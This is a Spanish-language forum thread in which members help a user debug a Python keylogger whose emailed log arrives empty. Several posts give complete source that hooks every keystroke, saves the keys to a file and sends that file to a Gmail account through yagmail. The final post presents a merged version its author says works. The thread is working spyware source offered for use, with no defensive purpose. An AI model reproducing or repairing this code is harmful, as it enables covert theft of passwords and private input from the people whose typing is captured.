Problema con Keylogger en Python (No envía el log)

Iniciado por TheFerret, 10 Abril 2019, 00:13 AM

0 Miembros y 2 Visitantes están viendo este tema.

Segadorfelix

En el ultimo script, creo que falta importar estos módulos. Prueba si funciona.

Código (python) [Seleccionar]

import time, datetime
import smtplib
import sys


En el primer script sobra:

Código (python) [Seleccionar]
import yagmail

En el segundo script sobra:

Código (python) [Seleccionar]
import atexit
import os
import keyboard

if __name__ == "__main__":
    main()


Si el ultimo script sigue sin funcionar, postea que error da, o que ocurre (Por ejemplo: No envía el correo, no crea el archivo que guarda los datos). Revisar la zona de spam en el correo.

Mucha suerte!


TheFerret

Ahora funciona perfectamente el segundo script, el de enviar el correo, pero el primer script no funciona.  :xD 

Es decir, ejecuto el keylogger, todo correcto, pero cuando reviso el correo me llega el log vacío. Adjunto el código de los script juntos:

Código (python) [Seleccionar]
from functools import partial
import atexit
import os
import keyboard
MAP = {
    "space": " ",
    "\r": "\n"
}
# Ubicación y nombre del archivo que guarda las teclas presionadas.
FILE_NAME = "keys.txt"
# Determina si el archivo de salida es limpiado cada vez que se
# inicia el programa.
CLEAR_ON_STARTUP = False
# Tecla para terminar el programa o None para no utilizar ninguna tecla.
TERMINATE_KEY = "esc"
def callback(output, is_down, event):
    if event.event_type in ("up", "down"):
        key = MAP.get(event.name, event.name)
        modifier = len(key) > 1
        # Capturar únicamente los modificadores cuando están siendo
        # presionados.
        if not modifier and event.event_type == "down":
            return
        # Evitar escribir múltiples veces la misma tecla si está
        # siendo presionada.
        if modifier:
            if event.event_type == "down":
                if is_down.get(key, False):
                    return
                else:
                    is_down[key] = True
            elif event.event_type == "up":
                is_down[key] = False
            # Indicar si está siendo presionado.
            key = " [{} ({})] ".format(key, event.event_type)
        elif key == "\r":
            # Salto de línea.
            key = "\n"
        # Escribir la tecla al archivo de salida.
        output.write(key)
        # Forzar escritura.
        output.flush()
def onexit(output):
    output.close()
def main():
    # Borrar el archivo previo.
    if CLEAR_ON_STARTUP:
        os.remove(FILE_NAME)
   
    # Indica si una tecla está siendo presionada.
    is_down = {}
   
    # Archivo de salida.
    output = open(FILE_NAME, "a")
   
    # Cerrar el archivo al terminar el programa.
    atexit.register(onexit, output)
   
    # Instalar el registrador de teclas.
    keyboard.hook(partial(callback, output, is_down))
    keyboard.wait(TERMINATE_KEY)



from functools import partial
import time, datetime
import smtplib
import yagmail
import sys



yag = yagmail.SMTP('correo@gmail.com', 'contraseña')
yag
img = "C:/Users/Andrés/Desktop/keys.txt"
yag.send('correo@gmail.com', "Birthday", contents = [img])



NOTA: Sospechando que lo que sucedía era que al no existir un temporizador, Python no me dejaba escribir pues ya enviaba el fichero directamente, probé a colocar un time.sleep(20), pero el resultado es el mismo lamentablemente

yuimugi912

#12
prueba cerrando el archivo cada vez que escribes algo en el , en vez de hacerlo al final , a veces termina en la ram y luego no lo escribe hasta que le das close

otra opcion es que sea un bug de la libreria, pero sigue saliendo el mismo error?


Edit: ahh veo que usas flush para eso del archivo

TheFerret

Puede ser que el error esté en la parte de "#Cerrar el archivo al terminar al programa"?

Quizás el programa queda corriendo y el archivo no llega a cerrarse y por eso no se guarda nada? Podría ser?


Actualmente no sale error alguno, el programa se ejecuta sin errores, y por separado funcionan excelente, solo al unirlos llega el correo pero con un log vacío, vamos, que básicamente o no está escribiendo o no está guardando lo escrito...

yuimugi912

#14
Cita de: TheFerret en 24 Abril 2019, 03:59 AM
Puede ser que el error esté en la parte de "#Cerrar el archivo al terminar al programa"?

Quizás el programa queda corriendo y el archivo no llega a cerrarse y por eso no se guarda nada? Podría ser?


no tendria porque cuando le haces archivo.flush() escribe sin necesidad de cerrar el archivo .

PD: si dices que separado funciona bien, es decir que el log se escribe por separado pero por correo no llega?
.Si la respuesta es si prueba copiar el archivo y enviar la copia por si acaso no se ha cerrado y el sistema operativo lo esta bloqueando

TheFerret

#15
Cita de: yuimugi912 en 26 Abril 2019, 03:38 AM
no tendria porque cuando le haces archivo.flush() escribe sin necesidad de cerrar el archivo .

PD: si dices que separado funciona bien, es decir que el log se escribe por separado pero por correo no llega?
.Si la respuesta es si prueba copiar el archivo y enviar la copia por si acaso no se ha cerrado y el sistema operativo lo esta bloqueando

Por separado funcionan ambas cosas, es decir, yo si ejecuto primero un script y luego el otro, funciona todo excelente. Al ejecutar el primer script guarda el registro de teclas en el archivo y al ejecutar el segundo script, envía el archivo al correo electrónico.

Pero en cuanto quiero hacer de esos dos script un solo script ya vienen los problemas, pues llega el correo, pero con el fichero sin alterar, es decir, sin registrar las teclas.

Respecto a lo segundo, voy a intentarlo, pero es raro pues el script sólo sí que funciona sin problemas (tanto el primero como el segundo)

EDITO: Acabo de intentar copiar el fichero con el módulo Shutil y que se envíe el fichero copiado al correo, pero nada, sigue llegando vacío  :-\

Segadorfelix

#16
Prueba este código, le hice modificaciones mínimas, pero puede que sirva.
*La importación de módulos ocurre toda de una vez y al inicio.
*El valor del archivo al cual se le debe escribir, esta especificado junto a la ruta.

Código (python) [Seleccionar]
from functools import partial
import time, datetime
import smtplib
import yagmail
import sys
import atexit
import os
import keyboard

MAP = {
   "space": " ",
   "\r": "\n"
}
# Ubicación y nombre del archivo que guarda las teclas presionadas.
FILE_NAME = "C:/Users/Andrés/Desktop/keys.txt"
# Determina si el archivo de salida es limpiado cada vez que se
# inicia el programa.
CLEAR_ON_STARTUP = False
# Tecla para terminar el programa o None para no utilizar ninguna tecla.
TERMINATE_KEY = "esc"
def callback(output, is_down, event):
   if event.event_type in ("up", "down"):
       key = MAP.get(event.name, event.name)
       modifier = len(key) > 1
       # Capturar únicamente los modificadores cuando están siendo
       # presionados.
       if not modifier and event.event_type == "down":
           return
       # Evitar escribir múltiples veces la misma tecla si está
       # siendo presionada.
       if modifier:
           if event.event_type == "down":
               if is_down.get(key, False):
                   return
               else:
                   is_down[key] = True
           elif event.event_type == "up":
               is_down[key] = False
           # Indicar si está siendo presionado.
           key = " [{} ({})] ".format(key, event.event_type)
       elif key == "\r":
           # Salto de línea.
           key = "\n"
       # Escribir la tecla al archivo de salida.
       output.write(key)
       # Forzar escritura.
       output.flush()
def onexit(output):
   output.close()
def main():
   # Borrar el archivo previo.
   if CLEAR_ON_STARTUP:
       os.remove(FILE_NAME)

   # Indica si una tecla está siendo presionada.
   is_down = {}

   # Archivo de salida.
   output = open(FILE_NAME, "a")

   # Cerrar el archivo al terminar el programa.
   atexit.register(onexit, output)

   # Instalar el registrador de teclas.
   keyboard.hook(partial(callback, output, is_down))
   keyboard.wait(TERMINATE_KEY)
 

yag = yagmail.SMTP('correo@gmail.com', 'contraseña')
yag
img = "C:/Users/Andrés/Desktop/keys.txt"
yag.send('correo@gmail.com', "Birthday", contents = [img])


Si sigue sin funcionar, luego de probarlo, cambia a Ruby que es más divertido  ;D es broma, si no funciona, voy a darle una ojeada más sería, para ver que pasa.

TheFerret

Cita de: Segadorfelix en 26 Abril 2019, 10:53 AM
Prueba este código, le hice modificaciones mínimas, pero puede que sirva.
*La importación de módulos ocurre toda de una vez y al inicio.
*El valor del archivo al cual se le debe escribir, esta especificado junto a la ruta.

Código (python) [Seleccionar]
from functools import partial
import time, datetime
import smtplib
import yagmail
import sys
import atexit
import os
import keyboard

MAP = {
   "space": " ",
   "\r": "\n"
}
# Ubicación y nombre del archivo que guarda las teclas presionadas.
FILE_NAME = "C:/Users/Andrés/Desktop/keys.txt"
# Determina si el archivo de salida es limpiado cada vez que se
# inicia el programa.
CLEAR_ON_STARTUP = False
# Tecla para terminar el programa o None para no utilizar ninguna tecla.
TERMINATE_KEY = "esc"
def callback(output, is_down, event):
   if event.event_type in ("up", "down"):
       key = MAP.get(event.name, event.name)
       modifier = len(key) > 1
       # Capturar únicamente los modificadores cuando están siendo
       # presionados.
       if not modifier and event.event_type == "down":
           return
       # Evitar escribir múltiples veces la misma tecla si está
       # siendo presionada.
       if modifier:
           if event.event_type == "down":
               if is_down.get(key, False):
                   return
               else:
                   is_down[key] = True
           elif event.event_type == "up":
               is_down[key] = False
           # Indicar si está siendo presionado.
           key = " [{} ({})] ".format(key, event.event_type)
       elif key == "\r":
           # Salto de línea.
           key = "\n"
       # Escribir la tecla al archivo de salida.
       output.write(key)
       # Forzar escritura.
       output.flush()
def onexit(output):
   output.close()
def main():
   # Borrar el archivo previo.
   if CLEAR_ON_STARTUP:
       os.remove(FILE_NAME)

   # Indica si una tecla está siendo presionada.
   is_down = {}

   # Archivo de salida.
   output = open(FILE_NAME, "a")

   # Cerrar el archivo al terminar el programa.
   atexit.register(onexit, output)

   # Instalar el registrador de teclas.
   keyboard.hook(partial(callback, output, is_down))
   keyboard.wait(TERMINATE_KEY)
 

yag = yagmail.SMTP('correo@gmail.com', 'contraseña')
yag
img = "C:/Users/Andrés/Desktop/keys.txt"
yag.send('correo@gmail.com', "Birthday", contents = [img])


Si sigue sin funcionar, luego de probarlo, cambia a Ruby que es más divertido  ;D es broma, si no funciona, voy a darle una ojeada más sería, para ver que pasa.


Jajajajaja a este paso si eh,no le caigo muy bien a Python, ya estamos teniendo roces nada más empezar  :xD

Acabo de probar y lamentablemente el resultado arrojado es el mismo, fichero enviado al correo pero intacto. Respecto a lo de la importación de módulos al inicio y el valor del archivo especificado junto a la ruta, te agradezco que arregles mi caos de código jajaja. Pero nada, la cosa sigue igual  :huh:

Segadorfelix

Prueba este código, creo que el error estaba en usar a yagmail antes de:

Código (python) [Seleccionar]

if __name__ == "__main__":
    main()


Código:

Código (python) [Seleccionar]

from functools import partial
import atexit
import os
import keyboard
import time, datetime
import smtplib
import yagmail
import sys

MAP = {
    "space": " ",
    "\r": "\n"
}
# Ubicación y nombre del archivo que guarda las teclas presionadas.
FILE_NAME = "C:/Users/Andrés/Desktop/keys.txt"
# Determina si el archivo de salida es limpiado cada vez que se
# inicia el programa.
CLEAR_ON_STARTUP = False
# Tecla para terminar el programa o None para no utilizar ninguna tecla.
TERMINATE_KEY = "esc"
def callback(output, is_down, event):
    if event.event_type in ("up", "down"):
        key = MAP.get(event.name, event.name)
        modifier = len(key) > 1
        # Capturar únicamente los modificadores cuando están siendo
        # presionados.
        if not modifier and event.event_type == "down":
            return
        # Evitar escribir múltiples veces la misma tecla si está
        # siendo presionada.
        if modifier:
            if event.event_type == "down":
                if is_down.get(key, False):
                    return
                else:
                    is_down[key] = True
            elif event.event_type == "up":
                is_down[key] = False
            # Indicar si está siendo presionado.
            key = " [{} ({})] ".format(key, event.event_type)
        elif key == "\r":
            # Salto de línea.
            key = "\n"
        # Escribir la tecla al archivo de salida.
        output.write(key)
        # Forzar escritura.
        output.flush()
def onexit(output):
    output.close()
def main():
    # Borrar el archivo previo.
    if CLEAR_ON_STARTUP:
        os.remove(FILE_NAME)

    # Indica si una tecla está siendo presionada.
    is_down = {}

    # Archivo de salida.
    output = open(FILE_NAME, "a")

    # Cerrar el archivo al terminar el programa.
    atexit.register(onexit, output)

    # Instalar el registrador de teclas.
    keyboard.hook(partial(callback, output, is_down))
    keyboard.wait(TERMINATE_KEY)

if __name__ == "__main__":
    main()

yag = yagmail.SMTP('correo@gmail.com', 'contraseña')
yag
img = "C:/Users/Andrés/Desktop/keys.txt"
yag.send('correo@gmail.com', "JoJoJo", contents = [img])


A mi me funciona correctamente, instale con un instalador el modulo keyboard, y yagmail por pip.

Si sigue fallando puede que el cortafuegos este 'atrofiando' a yagmail, como dice yumigumi.

Si falla, primero revisa, el archivo keys.txt del escritorio, si se esta escribiendo correctamente. Después si sale un error, puedes subir una captura a https://es.imgbb.com/ y despues al foro, para ver de que se trata.

Y si no sale un error, el keys.txt se escribe correctamente y las ubicaciones del archivo y el correo están bien, entonces no queda otra que revisar el cortafuegos.

Mucha suerte!